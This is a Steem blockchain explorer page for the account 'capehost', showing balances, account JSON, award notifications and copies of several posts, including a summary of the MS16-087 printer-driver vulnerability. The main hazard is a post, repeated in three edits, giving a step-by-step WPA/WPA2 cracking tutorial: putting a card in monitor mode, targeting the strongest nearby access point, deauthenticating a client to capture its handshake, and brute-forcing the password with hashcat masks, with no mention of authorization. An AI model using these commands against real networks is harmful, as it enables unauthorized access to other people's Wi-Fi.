Ecoer Logo
VOTING POWER100.00%
DOWNVOTE POWER100.00%
RESOURCE CREDITS100.00%
REPUTATION PROGRESS82.82%
Net Worth
0.484USD
STEEM
0.000STEEM
SBD
0.118SBD
Own SP
7.374SP

Detailed Balance

STEEM
balance
0.000STEEM
market_balance
0.000STEEM
savings_balance
0.000STEEM
reward_steem_balance
0.000STEEM
STEEM POWER
Own SP
7.374SP
Delegated Out
0.000SP
Delegation In
0.000SP
Effective Power
7.374SP
Reward SP (pending)
0.000SP
SBD
sbd_balance
0.118SBD
sbd_conversions
0.000SBD
sbd_market_balance
0.000SBD
savings_sbd_balance
0.000SBD
reward_sbd_balance
0.000SBD
{
  "balance": "0.000 STEEM",
  "savings_balance": "0.000 STEEM",
  "reward_steem_balance": "0.000 STEEM",
  "vesting_shares": "11995.162962 VESTS",
  "delegated_vesting_shares": "0.000000 VESTS",
  "received_vesting_shares": "0.000000 VESTS",
  "sbd_balance": "0.118 SBD",
  "savings_sbd_balance": "0.000 SBD",
  "reward_sbd_balance": "0.000 SBD",
  "conversions": []
}

Account Info

namecapehost
id46580
rank164,397
reputation9570070658
created2016-08-05T10:38:03
recovery_accountsteem
proxyNone
post_count6
comment_count0
lifetime_vote_count0
witnesses_voted_for0
last_post2016-08-16T08:19:45
last_root_post2016-08-16T08:19:45
last_vote_time2016-08-16T05:36:42
proxied_vsf_votes0, 0, 0, 0
can_vote1
voting_power9,701
delayed_votes0
balance0.000 STEEM
savings_balance0.000 STEEM
sbd_balance0.118 SBD
savings_sbd_balance0.000 SBD
vesting_shares11995.162962 VESTS
delegated_vesting_shares0.000000 VESTS
received_vesting_shares0.000000 VESTS
reward_vesting_balance0.000000 VESTS
vesting_balance0.000 STEEM
vesting_withdraw_rate0.000000 VESTS
next_vesting_withdrawal1969-12-31T23:59:59
withdrawn0
to_withdraw0
withdraw_routes0
savings_withdraw_requests0
last_account_recovery1970-01-01T00:00:00
reset_accountnull
last_owner_update1970-01-01T00:00:00
last_account_update1970-01-01T00:00:00
minedNo
sbd_seconds25,344,534
sbd_last_interest_payment2016-09-05T22:18:15
savings_sbd_last_interest_payment1970-01-01T00:00:00
{
  "id": 46580,
  "name": "capehost",
  "owner": {
    "weight_threshold": 1,
    "account_auths": [],
    "key_auths": [
      [
        "STM7y3vaKVzR3uQTmLq44j95e3fM6ccdgHrC3npbYK1PmREjQfXtE",
        1
      ]
    ]
  },
  "active": {
    "weight_threshold": 1,
    "account_auths": [],
    "key_auths": [
      [
        "STM7Pm9wY2sTBydtiSioF7zJ7ygqnSx5dNmjBLEVCrAAgctu2zgX2",
        1
      ]
    ]
  },
  "posting": {
    "weight_threshold": 1,
    "account_auths": [],
    "key_auths": [
      [
        "STM6VRJHoCrMWfH1D5mwxeMJoN8xdjXXpSuSA5qXQmC2JLxi22BsY",
        1
      ]
    ]
  },
  "memo_key": "STM8E2ehRvH91eksSPiAKWzaQdvfJ7R3YZQo5L34STjRSvXYGTgfK",
  "json_metadata": "",
  "posting_json_metadata": "",
  "proxy": "",
  "last_owner_update": "1970-01-01T00:00:00",
  "last_account_update": "1970-01-01T00:00:00",
  "created": "2016-08-05T10:38:03",
  "mined": false,
  "recovery_account": "steem",
  "last_account_recovery": "1970-01-01T00:00:00",
  "reset_account": "null",
  "comment_count": 0,
  "lifetime_vote_count": 0,
  "post_count": 6,
  "can_vote": true,
  "voting_manabar": {
    "current_mana": 9701,
    "last_update_time": 1471325802
  },
  "downvote_manabar": {
    "current_mana": 0,
    "last_update_time": 1470393483
  },
  "voting_power": 9701,
  "balance": "0.000 STEEM",
  "savings_balance": "0.000 STEEM",
  "sbd_balance": "0.118 SBD",
  "sbd_seconds": "25344534",
  "sbd_seconds_last_update": "2016-09-10T09:25:06",
  "sbd_last_interest_payment": "2016-09-05T22:18:15",
  "savings_sbd_balance": "0.000 SBD",
  "savings_sbd_seconds": "0",
  "savings_sbd_seconds_last_update": "1970-01-01T00:00:00",
  "savings_sbd_last_interest_payment": "1970-01-01T00:00:00",
  "savings_withdraw_requests": 0,
  "reward_sbd_balance": "0.000 SBD",
  "reward_steem_balance": "0.000 STEEM",
  "reward_vesting_balance": "0.000000 VESTS",
  "reward_vesting_steem": "0.000 STEEM",
  "vesting_shares": "11995.162962 VESTS",
  "delegated_vesting_shares": "0.000000 VESTS",
  "received_vesting_shares": "0.000000 VESTS",
  "vesting_withdraw_rate": "0.000000 VESTS",
  "next_vesting_withdrawal": "1969-12-31T23:59:59",
  "withdrawn": 0,
  "to_withdraw": 0,
  "withdraw_routes": 0,
  "curation_rewards": 0,
  "posting_rewards": 294,
  "proxied_vsf_votes": [
    0,
    0,
    0,
    0
  ],
  "witnesses_voted_for": 0,
  "last_post": "2016-08-16T08:19:45",
  "last_root_post": "2016-08-16T08:19:45",
  "last_vote_time": "2016-08-16T05:36:42",
  "post_bandwidth": 10000,
  "pending_claimed_accounts": 0,
  "vesting_balance": "0.000 STEEM",
  "reputation": "9570070658",
  "transfer_history": [],
  "market_history": [],
  "post_history": [],
  "vote_history": [],
  "other_history": [],
  "witness_votes": [],
  "tags_usage": [],
  "guest_bloggers": [],
  "rank": 164397
}

Withdraw Routes

IncomingOutgoing
Empty
Empty
{
  "incoming": [],
  "outgoing": []
}
From Date
To Date
2019/08/05 11:35:57
parent authorcapehost
parent permlinkthe-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network
authorsteemitboard
permlinksteemitboard-notify-capehost-20190805t113556000z
title
bodyCongratulations @capehost! You received a personal award! <table><tr><td>https://steemitimages.com/70x70/http://steemitboard.com/@capehost/birthday3.png</td><td>Happy Birthday! - You are on the Steem blockchain for 3 years!</td></tr></table> <sub>_You can view [your badges on your Steem Board](https://steemitboard.com/@capehost) and compare to others on the [Steem Ranking](https://steemitboard.com/ranking/index.php?name=capehost)_</sub> ###### [Vote for @Steemitboard as a witness](https://v2.steemconnect.com/sign/account-witness-vote?witness=steemitboard&approve=1) to get one more award and increased upvotes!
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Transaction InfoBlock #35286073/Trx a3e4601979cb6a2899b70e8e6ca203fb97837e4e
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  "timestamp": "2019-08-05T11:35:57",
  "op": [
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      "parent_author": "capehost",
      "parent_permlink": "the-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network",
      "author": "steemitboard",
      "permlink": "steemitboard-notify-capehost-20190805t113556000z",
      "title": "",
      "body": "Congratulations @capehost! You received a personal award!\n\n<table><tr><td>https://steemitimages.com/70x70/http://steemitboard.com/@capehost/birthday3.png</td><td>Happy Birthday! - You are on the Steem blockchain for 3 years!</td></tr></table>\n\n<sub>_You can view [your badges on your Steem Board](https://steemitboard.com/@capehost) and compare to others on the [Steem Ranking](https://steemitboard.com/ranking/index.php?name=capehost)_</sub>\n\n\n###### [Vote for @Steemitboard as a witness](https://v2.steemconnect.com/sign/account-witness-vote?witness=steemitboard&approve=1) to get one more award and increased upvotes!",
      "json_metadata": "{\"image\":[\"https://steemitboard.com/img/notify.png\"]}"
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2018/08/05 12:50:15
parent authorcapehost
parent permlinkthe-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network
authorsteemitboard
permlinksteemitboard-notify-capehost-20180805t125017000z
title
bodyCongratulations @capehost! You have received a personal award! [![](https://steemitimages.com/70x70/http://steemitboard.com/@capehost/birthday2.png)](http://steemitboard.com/@capehost) 2 Years on Steemit <sub>_Click on the badge to view your Board of Honor._</sub> > Do you like [SteemitBoard's project](https://steemit.com/@steemitboard)? Then **[Vote for its witness](https://v2.steemconnect.com/sign/account-witness-vote?witness=steemitboard&approve=1)** and **get one more award**!
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Transaction InfoBlock #24801624/Trx e8847a0c69cca1b8fa99c90407ba5ecddbad5972
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2017/08/05 11:02:30
parent authorcapehost
parent permlinkthe-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network
authorsteemitboard
permlinksteemitboard-notify-capehost-20170805t110232000z
title
bodyCongratulations @capehost! You have received a personal award! [![](https://steemitimages.com/70x70/http://steemitboard.com/@capehost/birthday1.png)](http://steemitboard.com/@capehost) Happy Birthday - 1 Year on Steemit Happy Birthday - 1 Year on Steemit Click on the badge to view your own Board of Honor on SteemitBoard. For more information about this award, click [here](https://steemit.com/steemitboard/@steemitboard/steemitboard-update-8-happy-birthday) > By upvoting this notification, you can help all Steemit users. Learn how [here](https://steemit.com/steemitboard/@steemitboard/http-i-cubeupload-com-7ciqeo-png)!
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Transaction InfoBlock #14306909/Trx e7cefa617ce673a9ab0b715d01966804cc773ee8
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      "title": "",
      "body": "Congratulations @capehost! You have received a personal award!\n\n[![](https://steemitimages.com/70x70/http://steemitboard.com/@capehost/birthday1.png)](http://steemitboard.com/@capehost)  Happy Birthday - 1 Year on Steemit Happy Birthday - 1 Year on Steemit\nClick on the badge to view your own Board of Honor on SteemitBoard.\n\nFor more information about this award, click [here](https://steemit.com/steemitboard/@steemitboard/steemitboard-update-8-happy-birthday)\n> By upvoting this notification, you can help all Steemit users. Learn how [here](https://steemit.com/steemitboard/@steemitboard/http-i-cubeupload-com-7ciqeo-png)!",
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capehostreceived 0.028 SBD, 0.070 SP author reward for @capehost / gpu-pwd-cracking
2016/09/10 09:25:06
authorcapehost
permlinkgpu-pwd-cracking
sbd payout0.028 SBD
steem payout0.000 STEEM
vesting payout114.448254 VESTS
Transaction InfoBlock #4844398/Virtual Operation #2
View Raw JSON Data
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  "op": [
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      "sbd_payout": "0.028 SBD",
      "steem_payout": "0.000 STEEM",
      "vesting_payout": "114.448254 VESTS"
    }
  ]
}
capehostreceived 0.028 SBD, 0.069 SP author reward for @capehost / avoid-detection-using-proxychains
2016/09/09 19:09:57
authorcapehost
permlinkavoid-detection-using-proxychains
sbd payout0.028 SBD
steem payout0.000 STEEM
vesting payout111.716673 VESTS
Transaction InfoBlock #4827423/Virtual Operation #2
View Raw JSON Data
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      "sbd_payout": "0.028 SBD",
      "steem_payout": "0.000 STEEM",
      "vesting_payout": "111.716673 VESTS"
    }
  ]
}
capehostreceived 0.031 SBD, 0.072 SP author reward for @capehost / today-s-question-what-s-a-proxy-server
2016/09/05 22:18:15
authorcapehost
permlinktoday-s-question-what-s-a-proxy-server
sbd payout0.031 SBD
steem payout0.000 STEEM
vesting payout117.316352 VESTS
Transaction InfoBlock #4716230/Virtual Operation #2
View Raw JSON Data
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      "sbd_payout": "0.031 SBD",
      "steem_payout": "0.000 STEEM",
      "vesting_payout": "117.316352 VESTS"
    }
  ]
}
capehostreceived 0.031 SBD, 0.074 SP author reward for @capehost / today-s-question-what-are-exploit-kits
2016/09/05 01:50:39
authorcapehost
permlinktoday-s-question-what-are-exploit-kits
sbd payout0.031 SBD
steem payout0.000 STEEM
vesting payout121.067403 VESTS
Transaction InfoBlock #4691721/Virtual Operation #2
View Raw JSON Data
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  "block": 4691721,
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  "timestamp": "2016-09-05T01:50:39",
  "op": [
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    {
      "author": "capehost",
      "permlink": "today-s-question-what-are-exploit-kits",
      "sbd_payout": "0.031 SBD",
      "steem_payout": "0.000 STEEM",
      "vesting_payout": "121.067403 VESTS"
    }
  ]
}
2016/08/16 08:56:51
voterdave-hughes
authorcapehost
permlinkthe-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network
weight10000 (100.00%)
Transaction InfoBlock #4127727/Trx 8abe95345bd2ca80744a4911347f6e7e09432f37
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2016/08/16 08:20:48
parent authorcapehost
parent permlinkthe-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network
authorcheetah
permlinkre-the-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network-20160816t082040
title
bodyHi! I am a content-detection robot. This post is to help manual curators; I have NOT flagged you. Here is similar content: https://www.cybrary.it/channelcontent/new-vulnerability-creates-dangerous-watering-hole-network/
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2016/08/16 08:19:45
parent author
parent permlinktech
authorcapehost
permlinkthe-new-vulnerability-that-creates-a-dangerous-watering-hole-in-your-network
titleThe New Vulnerability that Creates a Dangerous Watering Hole in Your Network
bodyhttp://i64.tinypic.com/ncmwk7.jpg Security researchers with Vectra Threat Labs recently uncovered a critical vulnerability affecting all versions of Microsoft Windows reaching all the way back to Windows 95. The vulnerability allows an attacker to execute code at system level either over a local network or the Internet. As a result, attackers could use this vulnerability both to infect an end-user from the Internet, and then spread through the internal network. Vectra and Microsoft collaborated during the investigation of this issue, and Microsoft has delivered a fix as part of Security Bulletin MS16-087, which is available here. The vulnerabilities, CVE-2016-3238 (MS16-087), and CVE-2016-3239, stem from the way users connect to printers in the office and over the Internet. This vulnerability could enable a relatively unsophisticated attacker to incorporate IoT devices as part of an attack and quickly infiltrate and spread through a network without detection. While this blog provides an overview of the vulnerability, you can read the in-depth technical analysis here. In addition, a video summary of the vulnerability is available here. The vulnerability in question centers around the ways that network users find and use printers on a network. Needless to say, modern organizations often have many users, and likewise often have many different makes and models of printers. Users expect to connect to and use whatever printer is most convenient, and likewise, mobile users expect to be able to come in to the office and print. To serve these users, organizations needs a way to deliver the necessary printer drivers to the users who need them. Instead of pushing every possible driver to all users, many networks use the Microsoft Web Point-and-Print (MS-WPRN) approach that allows a user to connect to any printer on the network, and have the printer or print server deliver the appropriate driver on demand. To make this as easy and seamless as possible, these drivers are often delivered without a warning or triggering User Account Controls (UAC). The problem is that these drivers are system-level drivers and they are housed on printers, which themselves are not typically well-secured. So if we put it all together we have a weakly secured device that talks to nearly every Windows end-user device, and is trusted to deliver a system-level driver without checks or warnings. If the hair on the back of your neck isn’t starting to stand up, it should. A local attacker on the network could easily replace the valid driver with a malicious file. When a new user tries to connect to the printer, the malicious file is delivered and run with system-level permissions, effectively handing over control of the machine to the attacker. This process could be repeated indefinitely, infecting each new user that visits the watering hole of the printer. So how would an attacker get the malicious file in question on the printer? Well she would have multiple options. Printers often have many services enabled and typically aren’t fastidiously patched, so finding a vulnerability to exploit is reasonably easy for a skilled attacker. However, an even easier approach would simply to try default login credentials such as admin/admin, which could allow the attacker to log in to the printer directly. Alternatively, an attacker could create a fake printer to advertise on the network. Thus far, you may be feeling relatively safe because all of this supposes that the attacker is already on your network. However, the same mechanism works over the Internet using the Internet Printing Protocol and webPointNPrint. This opens the door to infections being delivered over the Internet via normal Web-based vectors such as compromised websites or ads. A bit of javascript in an advertisement could easily trigger a request to a remote “printer” that would then deliver the malicious driver to the victim. Using both of these approaches, an attacker could both infect a user from the outside and then use his newly gained internal position to spread laterally within the network. As of 12 July 2016, Microsoft has provided a patch for this vulnerability as part of Security Bulletin MS16-087 and it is highly recommended that organizations apply the patch as soon as possible. It is also an example of the important role that IoT devices play in the security posture of the network. These devices can be hard to patch, hard to monitor and can quickly become a persistent blind-spot for security operations. This is a good reason to monitor all of your internal traffic regardless of the device type.
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Transaction InfoBlock #4126986/Trx dd798a66ad9cfedb1e26936f63d44df06d6f60df
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      "title": "The New Vulnerability that Creates a Dangerous Watering Hole in Your Network",
      "body": "http://i64.tinypic.com/ncmwk7.jpg\n\nSecurity researchers with Vectra Threat Labs recently uncovered a critical vulnerability affecting all versions of Microsoft Windows reaching all the way back to Windows 95. The vulnerability allows an attacker to execute code at system level either over a local network or the Internet. As a result, attackers could use this vulnerability both to infect an end-user from the Internet, and then spread through the internal network.\n\nVectra and Microsoft collaborated during the investigation of this issue, and Microsoft has delivered a fix as part of Security Bulletin MS16-087, which is available here.\n\nThe vulnerabilities, CVE-2016-3238 (MS16-087), and CVE-2016-3239, stem from the way users connect to printers in the office and over the Internet. This vulnerability could enable a relatively unsophisticated attacker to incorporate IoT devices as part of an attack and quickly infiltrate and spread through a network without detection. While this blog provides an overview of the vulnerability, you can read the in-depth technical analysis here. In addition, a video summary of the vulnerability is available here.\n\nThe vulnerability in question centers around the ways that network users find and use printers on a network. Needless to say, modern organizations often have many users, and likewise often have many different makes and models of printers. Users expect to connect to and use whatever printer is most convenient, and likewise, mobile users expect to be able to come in to the office and print.\n\nTo serve these users, organizations needs a way to deliver the necessary printer drivers to the users who need them. Instead of pushing every possible driver to all users, many networks use the Microsoft Web Point-and-Print (MS-WPRN) approach that allows a user to connect to any printer on the network, and have the printer or print server deliver the appropriate driver on demand. To make this as easy and seamless as possible, these drivers are often delivered without a warning or triggering User Account Controls (UAC).\n\nThe problem is that these drivers are system-level drivers and they are housed on printers, which themselves are not typically well-secured. So if we put it all together we have a weakly secured device that talks to nearly every Windows end-user device, and is trusted to deliver a system-level driver without checks or warnings. If the hair on the back of your neck isn’t starting to stand up, it should.\n\nA local attacker on the network could easily replace the valid driver with a malicious file. When a new user tries to connect to the printer, the malicious file is delivered and run with system-level permissions, effectively handing over control of the machine to the attacker. This process could be repeated indefinitely, infecting each new user that visits the watering hole of the printer.\n\nSo how would an attacker get the malicious file in question on the printer? Well she would have multiple options. Printers often have many services enabled and typically aren’t fastidiously patched, so finding a vulnerability to exploit is reasonably easy for a skilled attacker. However, an even easier approach would simply to try default login credentials such as admin/admin, which could allow the attacker to log in to the printer directly. Alternatively, an attacker could create a fake printer to advertise on the network.\n\nThus far, you may be feeling relatively safe because all of this supposes that the attacker is already on your network. However, the same mechanism works over the Internet using the Internet Printing Protocol and webPointNPrint. This opens the door to infections being delivered over the Internet via normal Web-based vectors such as compromised websites or ads. A bit of javascript in an advertisement could easily trigger a request to a remote “printer” that would then deliver the malicious driver to the victim. Using both of these approaches, an attacker could both infect a user from the outside and then use his newly gained internal position to spread laterally within the network.\n\n \n\nAs of 12 July 2016, Microsoft has provided a patch for this vulnerability as part of Security Bulletin MS16-087 and it is highly recommended that organizations apply the patch as soon as possible. It is also an example of the important role that IoT devices play in the security posture of the network. These devices can be hard to patch, hard to monitor and can quickly become a persistent blind-spot for security operations. This is a good reason to monitor all of your internal traffic regardless of the device type.",
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2016/08/16 05:36:42
votercapehost
authorarhag
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2016/08/16 05:36:21
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2016/08/16 05:35:51
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2016/08/16 05:35:42
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2016/08/16 05:35:33
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2016/08/16 05:35:18
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2016/08/14 07:23:15
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2016/08/14 07:22:57
parent authoremancipatedhuman
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authorcapehost
permlinkre-emancipatedhuman-easy-guide-to-cash-steem-dollars-for-btc-20160814t072256242z
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2016/08/14 07:22:15
votercapehost
authoremancipatedhuman
permlinkeasy-guide-to-cash-steem-dollars-for-btc
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2016/08/14 07:20:57
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2016/08/14 07:20:12
votercapehost
authorcraig-grant
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2016/08/14 07:20:03
votercapehost
authorlauralemons
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2016/08/14 07:18:06
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2016/08/14 07:18:03
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2016/08/14 07:17:57
votercapehost
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2016/08/14 07:17:42
votercapehost
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2016/08/14 07:17:30
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2016/08/14 07:17:12
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2016/08/14 07:17:06
votercapehost
authordollarvigilante
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2016/08/14 07:12:06
voterjuneaugoldbuyer
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2016/08/14 07:12:03
voterjuneaugoldbuyer
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2016/08/14 07:11:57
voterjuneaugoldbuyer
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2016/08/14 07:11:54
voterjuneaugoldbuyer
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2016/08/14 07:10:15
votercapehost
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capehostpublished a new post: gpu-pwd-cracking
2016/08/11 05:44:03
parent author
parent permlinkpassword
authorcapehost
permlinkgpu-pwd-cracking
titleUse GPU to Speed Up WPA/WPA2 Password Cracking
body@@ -6,16 +6,21 @@ mg src=%22 +http: //i63.ti
json metadata{"tags":["password","cracking","oclhashcat"],"image":["http://i63.tinypic.com/261hs2u.jpg"]}
Transaction InfoBlock #3980645/Trx a156939200b6b5045e755ca98303c08f8c8cc186
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2016/08/10 21:26:15
voterbitcoin102
authorcapehost
permlinkgpu-pwd-cracking
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2016/08/10 21:23:54
votermamm0nt
authorcapehost
permlinkgpu-pwd-cracking
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capehostpublished a new post: gpu-pwd-cracking
2016/08/10 21:22:24
parent author
parent permlinkpassword
authorcapehost
permlinkgpu-pwd-cracking
titleUse GPU to Speed Up WPA/WPA2 Password Cracking
body<p><img src="//i63.tinypic.com/261hs2u.jpg" /></p> <p>There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)</p> <ol> <li><strong>Aircrack-ng</strong></li> <li><strong>Oclhashcat</strong></li> </ol> <p>This guide assumes the following things:</p> <ul> <li>wlan0                             is a WiFi interface</li> <li>mon0                             is the interface in monitor mode</li> <li>&lt;channel&gt;                     refers to the channel the target WI-Fi is operating on</li> <li>00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)</li> <li>cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)</li> <li># (hash symbol)           is used to mark start of a command</li> </ul> <p><strong>Steps:</strong></p> <p>Open up a terminal </p> <p>Start by putting Wi-Fi interface in monitor mode</p> <pre><code>#airmon-ng start wlan0</code></pre> <p>This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.</p> <p>Then, start sniffing air for all AP’s in the area.</p> <pre><code>#airodump-ng mon0</code></pre> <p>This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.</p> <p>Press Ctrl+C to stop above command and type:</p> <pre><code>#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0</code></pre> <p>This command only sniffs for one specific AP:<br /> -c tells which channel to sniff<br /> -bssid is the MAC of AP to target<br /> -w tell to write a file to capture handshake (for later use in recovering password)<br /> mon0 is the monitor interface</p> <p>Notice the MAC address of clients shown in the terminal; we’ll need it for the next step. </p> <p>Now, open a second terminal and type:</p> <pre><code>#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0</code></pre> <p>This command says to de-authenticate a client from its AP<br /> -0 tell how many time to send deauth signal (in this case 5 times)<br /> -a tell the MAC of AP<br /> -c tell the MAC of client connect to AP (<em>Note:</em> you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)</p> <p>mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).</p> <p>Once handshake file is captured and written (in format file.cap), clean the file using the following command:</p> <pre><code>#wpaclean clean_file.cap captured.cap</code></pre> <p>Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). </p> <p>Now, prepare the file for hashcat by:</p> <pre><code>#aircrack-ng clean_file.cap -J for_cat</code></pre> <p>Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) </p> <p>Now, begin the cracking process by:</p> <p>#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask</p> <p>Here, –m 2500 tell to crack WPA/WPA2<br /> -a 3 tells to use brute-force or mask based brute force (more on it later)<br /> -session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)<br /> /for_cat.hccap is path to your captured and cleaned prepared hashcat file<br /> /mymask.hccap is path to the mask file</p> <p>Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) </p> <p><strong>NOTES ON HASHCAT MASKS</strong>The mask can take following format:</p> <ul> <li>?u for upper case letters (ABC…)</li> <li>?l for lower case letters (abc…)</li> <li>?d for numbers</li> <li>?s for symbols (ASCII only I think)</li> <li>?a use all of the above characters</li> </ul> <p>Thus to create a mask type in a black file:</p> <ul> <li>?d?d?d?d?d?d?d?d for a 8 digit password</li> </ul> <p>That’s it for this tutorial. </p>
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      "body": "<p><img src=\"//i63.tinypic.com/261hs2u.jpg\" /></p>\n<p>There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)</p>\n<ol>\n  <li><strong>Aircrack-ng</strong></li>\n  <li><strong>Oclhashcat</strong></li>\n</ol>\n<p>This guide assumes the following things:</p>\n<ul>\n  <li>wlan0                             is a WiFi interface</li>\n  <li>mon0                             is the interface in monitor mode</li>\n  <li>&lt;channel&gt;                     refers to the channel the target WI-Fi is operating on</li>\n  <li>00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)</li>\n  <li>cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)</li>\n  <li># (hash symbol)           is used to mark start of a command</li>\n</ul>\n<p><strong>Steps:</strong></p>\n<p>Open up a terminal </p>\n<p>Start by putting Wi-Fi interface in monitor mode</p>\n<pre><code>#airmon-ng start wlan0</code></pre>\n<p>This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.</p>\n<p>Then, start sniffing air for all AP’s in the area.</p>\n<pre><code>#airodump-ng mon0</code></pre>\n<p>This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.</p>\n<p>Press Ctrl+C to stop above command and type:</p>\n<pre><code>#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0</code></pre>\n<p>This command only sniffs for one specific AP:<br />\n-c tells which channel to sniff<br />\n-bssid is the MAC of AP to target<br />\n-w tell to write a file to capture handshake (for later use in recovering password)<br />\nmon0 is the monitor interface</p>\n<p>Notice the MAC address of clients shown in the terminal; we’ll need it for the next step. </p>\n<p>Now, open a second terminal and type:</p>\n<pre><code>#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0</code></pre>\n<p>This command says to de-authenticate a client from its AP<br />\n-0 tell how many time to send deauth signal (in this case 5 times)<br />\n-a tell the MAC of AP<br />\n-c tell the MAC of client connect to AP (<em>Note:</em> you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)</p>\n<p>mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).</p>\n<p>Once handshake file is captured and written (in format file.cap), clean the file using the following command:</p>\n<pre><code>#wpaclean clean_file.cap captured.cap</code></pre>\n<p>Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). </p>\n<p>Now, prepare the file for hashcat by:</p>\n<pre><code>#aircrack-ng clean_file.cap -J for_cat</code></pre>\n<p>Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) </p>\n<p>Now, begin the cracking process by:</p>\n<p>#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask</p>\n<p>Here, –m 2500 tell to crack WPA/WPA2<br />\n-a 3 tells to use brute-force or mask based brute force (more on it later)<br />\n-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)<br />\n/for_cat.hccap is path to your captured and cleaned prepared hashcat file<br />\n/mymask.hccap is path to the mask file</p>\n<p>Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) </p>\n<p><strong>NOTES ON HASHCAT MASKS</strong>The mask can take following format:</p>\n<ul>\n  <li>?u for upper case letters (ABC…)</li>\n  <li>?l for lower case letters (abc…)</li>\n  <li>?d for numbers</li>\n  <li>?s for symbols (ASCII only I think)</li>\n  <li>?a use all of the above characters</li>\n</ul>\n<p>Thus to create a mask type in a black file:</p>\n<ul>\n  <li>?d?d?d?d?d?d?d?d for a 8 digit password</li>\n</ul>\n<p>That’s it for this tutorial. </p>",
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2016/08/10 21:21:51
votercapehost
authorcapehost
permlinkgpu-pwd-cracking
weight10000 (100.00%)
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capehostpublished a new post: gpu-pwd-cracking
2016/08/10 21:21:51
parent author
parent permlinkpassword
authorcapehost
permlinkgpu-pwd-cracking
titleGPU pwd cracking
body<p><img src="//i63.tinypic.com/261hs2u.jpg" /></p> <p>There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)</p> <ol> <li><strong>Aircrack-ng</strong></li> <li><strong>Oclhashcat</strong></li> </ol> <p>This guide assumes the following things:</p> <ul> <li>wlan0                             is a WiFi interface</li> <li>mon0                             is the interface in monitor mode</li> <li>&lt;channel&gt;                     refers to the channel the target WI-Fi is operating on</li> <li>00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)</li> <li>cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)</li> <li># (hash symbol)           is used to mark start of a command</li> </ul> <p><strong>Steps:</strong></p> <p>Open up a terminal </p> <p>Start by putting Wi-Fi interface in monitor mode</p> <pre><code>#airmon-ng start wlan0</code></pre> <p>This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.</p> <p>Then, start sniffing air for all AP’s in the area.</p> <pre><code>#airodump-ng mon0</code></pre> <p>This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.</p> <p>Press Ctrl+C to stop above command and type:</p> <pre><code>#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0</code></pre> <p>This command only sniffs for one specific AP:<br /> -c tells which channel to sniff<br /> -bssid is the MAC of AP to target<br /> -w tell to write a file to capture handshake (for later use in recovering password)<br /> mon0 is the monitor interface</p> <p>Notice the MAC address of clients shown in the terminal; we’ll need it for the next step. </p> <p>Now, open a second terminal and type:</p> <pre><code>#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0</code></pre> <p>This command says to de-authenticate a client from its AP<br /> -0 tell how many time to send deauth signal (in this case 5 times)<br /> -a tell the MAC of AP<br /> -c tell the MAC of client connect to AP (<em>Note:</em> you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)</p> <p>mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).</p> <p>Once handshake file is captured and written (in format file.cap), clean the file using the following command:</p> <pre><code>#wpaclean clean_file.cap captured.cap</code></pre> <p>Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). </p> <p>Now, prepare the file for hashcat by:</p> <pre><code>#aircrack-ng clean_file.cap -J for_cat</code></pre> <p>Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) </p> <p>Now, begin the cracking process by:</p> <p>#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap 